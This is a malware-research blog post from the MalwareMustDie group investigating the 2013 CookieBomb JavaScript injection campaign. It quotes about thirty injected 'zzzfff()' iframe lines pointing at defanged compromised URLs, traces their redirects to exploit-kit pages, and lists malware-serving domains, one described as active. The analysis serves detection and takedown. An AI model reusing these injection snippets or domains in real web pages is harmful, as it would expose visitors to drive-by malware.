Malware Must Die!: What is behind #CookieBomb attack? (by @malm0u53)

Tuesday, July 23, 2013

What is behind #CookieBomb attack? (by @malm0u53)

You know me as @malm0u53 crusade member of MalwareMustDie. I would write about what #CookieBomb code injection's attack can actually damage and infect our system with this investigation report.

I saw a wide spread infection of code injection reported in here, and decided to help the investigation:

RT @unixfreaxjp: @Secluded_Memory you know I would if i could, I cant now, grab it from my prev.tweets, --- Helping too
— MalMouse (@malm0u53) July 22, 2013

As you may see in my tweets, I was struggling with the recent infection reported. And I came into conclusion of what to grep to follow and mitigate this attack further:

@Secluded_Memory @unixfreaxjp CookieBomb javascript. Which seems to be the function zzzfff()
— MalMouse (@malm0u53) July 22, 2013

@Secluded_Memory @unixfreaxjp one variant out of last three days - showkod(){ versus zzzfff() hxxp://airbrush-design.cz/images/nGMcmjkK.php
— MalMouse (@malm0u53) July 22, 2013

Which ending up to the list of the functions and its IFRAME redirection below:

" function zzzfff() { mdi.src = 'hxxp://kirtec.de/asvz/Mgf4RNhq.php';
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { e.src =   'hxxp://onewaypr.my-ehost.com/products/YFb48ymx.php';
" function zzzfff() { y.src =   'hxxp://yogyavilla.com/Map_Chinese_files/dtd.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function zzzfff() { kaizc.src ='hxxp://press2.blogolize.com/cnt.php';
" function zzzfff() { yk.src = 'hxxp://gidropark.net/traf.php';
" function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" function zzzfff() { e.src = 'hxxp://www.viagemanimais.com.br/2R83bpTL.php';
" function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
" function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';"
" function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
" function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
" function zzzfff() { ax.src = 'hxxp://portofmiamicruiseparking.com/log/dtd.php';
" function zzzfff() { orih.src = 'hxxp://smartsecurit.cz/clik.php';
" function zzzfff() { i.src = 'hxxp://hauser-consulting.com/relay.php';
" function zzzfff() { pndb.src = 'hxxp://rocklandaerospace.com/edi/x46kpMKR.php';
" function zzzfff() { iwuu.src = 'hxxp://www.mai-ban.com/clik.php';
" function zzzfff() { p.src = 'hxxp://koliba.xercom.cz/yjW7x3V8.php';
" function zzzfff() { chyo.src = 'hxxp://dv-suedpfalz.de/melde/dtd.php';
" function zzzfff() { iin.src = 'hxxp://casino.kuti-komi.com/traf.php';
" function zzzfff() { di.src = 'hxxp://web134.sv01.net-housting.de/dtd.php';
" function zzzfff() { gir.src = 'hxxp://www.teutorace2012.de/components/mjBr9dbV.php';
" function zzzfff() { obgn.src = 'hxxp://www.talkingtojesus.com/Backups/QLMyqwF9.php';
" function zzzfff() { qvhb.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { s.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { ucr.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { vpbo.src = 'hxxp://inntech.org.ru/counter.php'
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
[...]

Wow. Many links to follow.. So I made breakdown check for each PHP infectors as per released in pastebin: http://pastebin.com/raw.php?i=0cGUGk8X

The significant results I summarized below:

One of the link of:

" function zzzfff() {
ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect  >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm

Which goes straight to the exploit page landing page I mentioned here

The other link goes straight to the fake 502:

function zzzfff() {
rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
"  >> 500 Internal Server Error
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 
        mod_auth_passthrough/2.1 mod_bwlimited/1.4 
FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1

Verdict of the malicious URL above is here

One of the link redirecting to the localhost, strange for a good link is it?

" function zzzfff() {
     gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
  HTTP/1.1 302 Found

Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

One link lead to permanent redirection of Exploit Kit landing page, that IP is a Plesk panel user:

" function zzzfff() {
     gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
"  HTTP/1.1 301 Moved Permanently

Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin

↑Verdict: [1] and [2]

One link of:

" function zzzfff() {
 c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';" ＞
Redirects users to: 　hxxp://www.schwarzeraben.de/rel.php

Loads malware from:

fgnfdfthrv.bee.pl
alolipololi.osa.pl 
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru

↑This attack uses the .htaccess file to redirect users to a sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
The MMD tools for domains check shows result of:

fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,

which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection,
the fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl is currently blacklisted and other .RU domains is inactive.

The below links went straight to the blacklisted sites:

" function zzzfff() {
csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html

↑Verdict: [1] [2]

And..

" function zzzfff() {
     nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
"
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html

Verdict: [1] [2]

With many other similar results in the pastebin I reported here

This investigation is posted to help to verdict the malicious activities caused by #CiookieBomb code injection attack and the shutdown purpose for its detected malicious domains. The post is a work of the group effort, thank you to: @DarrelRendell and @Secluded_Memory for the help supporting this case with great advice.

#MalwareMustDie!